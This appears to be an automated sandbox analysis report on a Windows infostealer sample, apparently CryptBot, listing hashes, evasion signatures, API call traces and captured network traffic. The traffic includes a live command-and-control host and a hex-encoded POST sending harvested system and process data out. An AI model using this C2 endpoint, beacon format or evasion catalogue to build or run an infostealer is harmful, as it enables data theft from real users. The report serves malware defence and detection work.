Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1582491
MD5:f54b04dcddb77fdc57b307e8ec7daea1
SHA1:16a21d6803565b513ade671ec344867bbe5ba97e
SHA256:e83c43a49d2ab2c53f73acef9ccf4c2dca23c2c4d149108724b2d7a9dbbd2f14
Tags:CryptBotexeuser-aachum
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Contain functionality to detect virtual machines
Infostealer behavior detected
Leaks process information
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Set-up.exe (PID: 6700 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: F54B04DCDDB77FDC57B307E8EC7DAEA1)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C90730 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_00C90730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B88E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,0_2_00B88E90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A3F6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,0_2_00A3F6E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A41B40 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptGetProvParam,CryptGetProvParam,CryptGetProvParam,GetLastError,GetLastError,CryptReleaseContext,GetLastError,CryptReleaseContext,0_2_00A41B40
Source: Set-up.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0080255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008029FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_008029FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009DE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_009DE270
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0080255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then push ebp0_2_00BA1240
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /MTLObSmOhYIfQKgEYuXW1735556847 HTTP/1.1Host: home.eleventh11vs.topAccept: */*Content-Type: application/jsonContent-Length: 560083Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 30 37 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2
Source: global trafficHTTP traffic detected: GET /MTLObSmOhYIfQKgEYuXW1735556847?argument=0 HTTP/1.1Host: home.eleventh11vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /MTLObSmOhYIfQKgEYuXW1735556847 HTTP/1.1Host: home.eleventh11vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewASN Name: RELCOM-ASRelcomGroup19022019RU RELCOM-ASRelcomGroup19022019RU
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008CA8C0 recvfrom,0_2_008CA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /MTLObSmOhYIfQKgEYuXW1735556847?argument=0 HTTP/1.1Host: home.eleventh11vs.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.eleventh11vs.top
Source: unknownHTTP traffic detected: POST /MTLObSmOhYIfQKgEYuXW1735556847 HTTP/1.1Host: home.eleventh11vs.topAccept: */*Content-Type: application/jsonContent-Length: 560083Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 30 37 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Mon, 30 Dec 2024 17:12:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Mon, 30 Dec 2024 17:12:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: Set-up.exeString found in binary or memory: http://.css
Source: Set-up.exeString found in binary or memory: http://.jpg
Source: Set-up.exe, 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.eleventh11vs.top/MTL
Source: Set-up.exeString found in binary or memory: http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuX847
Source: Set-up.exe, Set-up.exe, 00000000.00000003.1769940616.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000003.1770044948.000000000126A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769708003.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769731422.0000000001265000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1771553083.000000000126B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847
Source: Set-up.exe, 00000000.00000003.1769940616.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1770044948.000000000126A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769708003.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769731422.0000000001265000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1771553083.000000000126B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847963
Source: Set-up.exe, Set-up.exe, 00000000.00000003.1769940616.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1770044948.000000000126A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769708003.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769731422.0000000001265000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1771553083.000000000126B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847?argument=0
Source: Set-up.exe, 00000000.00000003.1769940616.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1770044948.000000000126A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769708003.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769731422.0000000001265000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1771553083.000000000126B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847fd4
Source: Set-up.exe, 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847http://home.eleventh11vs.top/MTL
Source: Set-up.exeString found in binary or memory: http://html4/loose.dtd
Source: Set-up.exeString found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Set-up.exeString found in binary or memory: https://httpbin.org/ip
Source: Set-up.exeString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_012785A30_3_012785A3
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_012785A30_3_012785A3
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_012785A30_3_012785A3
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_012785A30_3_012785A3
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008105B00_2_008105B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00816FA00_2_00816FA0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009F00800_2_009F0080
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009700F00_2_009700F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008D00E00_2_008D00E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B500320_2_00B50032
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B8A0000_2_00B8A000
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B0C0500_2_00B0C050
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B8E0500_2_00B8E050
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008AE0700_2_008AE070
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B1C1A00_2_00B1C1A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6E1380_2_00A6E138
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A901700_2_00A90170
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009741700_2_00974170
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B5E2F00_2_00B5E2F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AC42F00_2_00AC42F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008762E00_2_008762E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B762D00_2_00B762D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008662100_2_00866210
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009902000_2_00990200
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008CE3E00_2_008CE3E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008CC3200_2_008CC320
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009F03500_2_009F0350
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0084E4800_2_0084E480
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009224A00_2_009224A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B544100_2_00B54410
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009624300_2_00962430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008D04200_2_008D0420
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B6C4700_2_00B6C470
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B704600_2_00B70460
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00ABE4500_2_00ABE450
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B685A00_2_00B685A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B805900_2_00B80590
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6E5D00_2_00A6E5D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B705600_2_00B70560
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AC26E00_2_00AC26E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080E6200_2_0080E620
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B7A6100_2_00B7A610
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009EA7800_2_009EA780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B847800_2_00B84780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A487D00_2_00A487D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B667300_2_00B66730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009887300_2_00988730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008CC7700_2_008CC770
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B548A00_2_00B548A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B7A8000_2_00B7A800
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009749F00_2_009749F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008BC9000_2_008BC900
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008149400_2_00814940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080A9600_2_0080A960
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B7E9400_2_00B7E940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B809400_2_00B80940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00886AA00_2_00886AA0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009D6AC00_2_009D6AC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009F8AC00_2_009F8AC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B6EA700_2_00B6EA70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B66BB00_2_00B66BB0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080CBB00_2_0080CBB0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B78BF00_2_00B78BF0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009EABC00_2_009EABC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B5CB000_2_00B5CB00
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A30B600_2_00A30B60
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AC0B700_2_00AC0B70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B8CC900_2_00B8CC90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B7CD800_2_00B7CD80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008B2DC00_2_008B2DC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B74D500_2_00B74D50
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B84D400_2_00B84D40
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00966E900_2_00966E90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B1AE300_2_00B1AE30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AFCE300_2_00AFCE30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008CEF900_2_008CEF90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B52F900_2_00B52F90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B26F800_2_00B26F80
